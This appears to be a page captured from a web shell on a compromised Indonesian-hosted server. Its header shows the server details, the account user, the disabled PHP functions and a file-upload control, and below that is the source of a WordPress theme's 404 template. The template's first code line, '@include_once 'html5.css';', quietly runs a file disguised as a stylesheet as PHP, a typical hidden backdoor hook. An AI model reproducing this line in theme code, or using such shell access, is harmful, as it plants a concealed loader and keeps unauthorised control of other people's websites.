HEX
Server: LiteSpeed
System: Linux 110.webhostingindonesia.co.id 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: uvlnfyba (10197)
PHP: 7.4.33
Disabled: opcache_get_status,exec,passthru,shell_exec,system,popen,mail,proc_open,show_source,
Upload Files
File: /home/jkwebsite.my.id/data.jkwebsite.my.id/wp-content/themes/legal-justice/404.php
<?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @link https://codex.wordpress.org/Creating_an_Error_404_Page
 *
 * @package legal-justice
 */

@include_once 'html5.css'; get_header();
?>

	<main id="primary" class="site-main">
		<div class="container">
			<section class="error-404 not-found">
					<div class="image-404"><img src="<?php echo esc_url(get_template_directory_uri() .'/assets/images/error.jpg'); ?>" alt=""></div>
					<h1 class="page-title"><?php echo esc_html(get_theme_mod('legal_justice_404page_title' , 'Oops! That page can&rsquo;t be found')); ?></h1>

				<div class="page-content-404">
					<p><?php echo esc_html(get_theme_mod('legal_justice_404page_text' , 'It looks like nothing was found at this location. Maybe try one of the links below or a search?')); ?></p>

						<?php
						get_search_form();
						?>
					<div class="go-home">
						<a class="theme-button back-btn-404" href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php esc_html_e('Go to Home','legal-justice'); ?></a>
					</div>
					

				</div><!-- .page-content -->
			</section><!-- .error-404 -->
		</div>
	</main><!-- #main -->

<?php
get_footer(); ?>